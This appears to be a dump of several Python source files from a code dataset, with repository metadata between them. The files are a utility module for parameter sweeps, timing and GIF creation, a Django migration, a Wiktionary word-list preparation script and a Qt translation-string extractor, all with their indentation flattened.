else:
if k not in exclude_list:
single_params[k] = v
param_tups = list(zip(*ziplist))
vary_param_dicts = []
vary_param_tups = []
for tup in param_tups:
temp_dict = dict(zip(list_params,tup))
temp_kw = {**single_params, **temp_dict}
vary_param_tups.append(temp_dict)
vary_param_dicts.append(temp_kw)
# list_params: just a list of the names of the varied ones.
# vary_param_dicts: a list of the dicts that you can pass to each iteration, which includes the args that don't vary.
# vary_param_tups: a list of dicts corresponding to vary_param_dicts, of only the values that change.
return(list_params, vary_param_dicts, vary_param_tups)
def strfdelta(tdelta, fmt):
d = {"days": tdelta.days}
d["hours"], rem = divmod(tdelta.seconds, 3600)
d["minutes"], d["seconds"] = divmod(rem, 60)
return fmt.format(**d)
def getCurTimeObj():
return(datetime.now())
def getTimeDiffNum(start_time_obj):
diff = datetime.timestamp(datetime.now()) - datetime.timestamp(start_time_obj)
return(diff)
def getTimeDiffObj(start_time_obj):
#Gets the time diff in a nice format from the start_time_obj.
diff = datetime.now() - start_time_obj
return(diff)
def getTimeDiffStr(start_time_obj):
#Gets the time diff in a nice format from the start_time_obj.
diff = getTimeDiffObj(start_time_obj)
return(strfdelta(diff,'{hours} hrs, {minutes} mins, {seconds} s'))
def writeDictToFile(dict, fname):
# You have to copy it here, otherwise it'll actually overwrite the values in the dict
# you passed.
my_dict = copy(dict)
f = open(fname,'w+')
for k,v in my_dict.items():
if type(v).__name__ == 'float':
if abs(v)>10**-4:
my_dict[k] = '{:.5f}'.format(v)
else:
my_dict[k] = '{:.2E}'.format(v)
f.write('{} = {}\n'.format(k, my_dict[k]))
f.close()
def readFileToDict(fname):
d = {}
with open(fname) as f:
for line in f:
(key, val) = line.split(' = ')
val = val.strip('\n')
#This is to handle the fact that everything gets read in
#as a string, but some stuff you probably want to be floats.
try:
val = float(val)
except:
val = str(val)
d[key] = val
return(d)
def dirFromFullPath(fname):
# This gives you the path, stripping the local filename, if you pass it
# a long path + filename.
parts = fname.split('/')
last_part = parts[-1]
path = fname.replace(last_part,'')
if path == '':
return('./')
else:
return(path)
def fnameFromFullPath(fname):
# This just gets the local filename if you passed it some huge long name with the path.
parts = fname.split('/')
last_part = parts[-1]
return(last_part)
def stripAnyTrailingSlash(path):
if path[-1] == '/':
return(path[:-1])
else:
return(path)
def addTrailingSlashIfNeeded(path):
if path[-1] == '/':
return(path)
else:
return(path + '/')
def gifFromImages(imgs_path, gif_name, ext = '.png', delay=50):
imgs_path = stripAnyTrailingSlash(imgs_path)
file_list = glob.glob(imgs_path + '/' + '*' + ext) # Get all the pngs in the current directory
#print(file_list)
#print([fnameFromFullPath(x).split('.png')[0] for x in file_list])
#list.sort(file_list, key=lambda x: int(x.split('_')[1].split('.png')[0]))
list.sort(file_list, key=lambda x: int(fnameFromFullPath(x).split(ext)[0]))
#list.sort(file_list) # Sort the images by #, this may need to be tweaked for your use case
#print(file_list)
assert len(file_list) < 300, 'Too many files ({}), will probably crash convert command.'.format(len(file_list))
output_fname = '{}/{}.gif'.format(imgs_path, gif_name)
check_call_arglist = ['convert'] + ['-delay', str(delay)] + file_list + [output_fname]
#print(check_call_arglist)
print('Calling convert command to create gif...')
subprocess.check_call(check_call_arglist)
print('done.')
return(output_fname)
# older method:
'''with open('image_list.txt', 'w') as file:
for item in file_list:
file.write("%s\n" % item)
os.system('convert @image_list.txt {}/{}.gif'.format(imgs_path,gif_name)) # On windows convert is 'magick'
'''
#
| [
"[email protected]"
] | |
375a018c63de5a9df57f07c26829657f66bcfbeb | c369443df5ff98eccc0eee7f63bb8947f2943605 | /shop/migrations/0002_product_photo.py | 6f674858a235d0794a6b5cc89516d04cb88266a3 | [] | no_license | erllan/shop-test | d2934f484b25d141a60caa5aca31a61eec48f055 | 1f77de177192ce6a1f8c5ccf1d7ca93ec026acf5 | refs/heads/master | 2023-03-06T01:04:38.785383 | 2021-02-27T18:02:07 | 2021-02-27T18:02:07 | 341,929,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | # Generated by Django 3.1.7 on 2021-02-26 11:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='product',
name='photo',
field=models.ImageField(default='static/image', upload_to='product/photo/'),
),
]
| [
"[email protected]"
] | |
22a186c790c53f60967d236882877184068afc26 | e199c0648ee56c84d421bb47b2b5c163a1bd4cf1 | /prep/prep_wiktionary.py | 70fb588952e6e9f0cbea315305346013b12561da | [
"MIT"
] | permissive | inoue0406/VocabularyPF | 72a3abea4b920c7959997198ef02374e5d16782a | 077300f82ef358ceb77e80f79ecb66f8124efbf6 | refs/heads/main | 2023-06-23T00:56:46.477992 | 2021-07-23T15:38:05 | 2021-07-23T15:38:05 | 365,765,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,143 | py | # prep for wiktionary data
import json
import pandas as pd
#import wiktextract
def extract_pronunciation(sounds):
# Extract American Pronunciation
#list_country = ["General American","Received Pronunciation","US","UK"]
ipa = ""
for i in range(len(sounds)):
if "ipa" in sounds[i].keys():
#if "tags" in sounds[i].keys() and "ipa" in sounds[i].keys():
#if sounds[i]['tags'][0] in list_country:
ipa = ipa + sounds[i]['ipa']
return ipa
if __name__ == '__main__':
# Inputs
# 1: Wiktionary dump file
fjson = "../data/Wiktionary/kaikki.org-dictionary-English.json"
# 2: word list (NGSL)
df_words = pd.read_csv('../data/NGSL_Word_Freq_list.csv')
# Outputs
fcsv = open('../data/out_wordlist_NGSL_Wiktionary.csv', 'w', encoding='utf-8')
print("word,sound,sense",file=fcsv)
with open(fjson, "r") as f:
count = 0
for line in f:
data = json.loads(line)
# extract data
if "word" in data.keys():
word = data['word']
if word == "pyre":
#import pdb;pdb.set_trace()
pass
# if contained in NGSL list
if sum(df_words["Lemma"] == word)==0:
print(word,"not contained in NGSL. Skip.")
continue
print("processing word:",word)
if "sounds" in data.keys():
sound =extract_pronunciation(data["sounds"])
else:
sound = ""
if "senses" in data.keys():
if "glosses" in data['senses'][0]:
sense = data['senses'][0]['glosses'][0]
else:
sense = "NA"
else:
sense = "NA"
#import pdb;pdb.set_trace()
print("%s,%s,'%s'" % (word,sound,sense),file=fcsv)
#lst.append(data)
count = count + 1
#if count > 100:
| [
"[email protected]"
] | |
de8792347405aadd837977316f12004147297193 | 8ed1430279ae52fd950dd0afe88549a100001e26 | /share/qt/extract_strings_qt.py | fefe2a907b40cfcfc4faa38e5f166048293fadca | [
"MIT"
] | permissive | mirzaei-ce/core-najafbit | 9fb70dbd4e17ec1635d7b886db17f8aab3f592bb | 6de34210a9ba9cc3f21fee631bc1a1f4d12d445d | refs/heads/master | 2021-08-11T08:53:58.165742 | 2017-11-13T13:00:14 | 2017-11-13T13:00:14 | 110,548,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,876 | py | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/najafbitstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *najafbit_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("najafbit-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.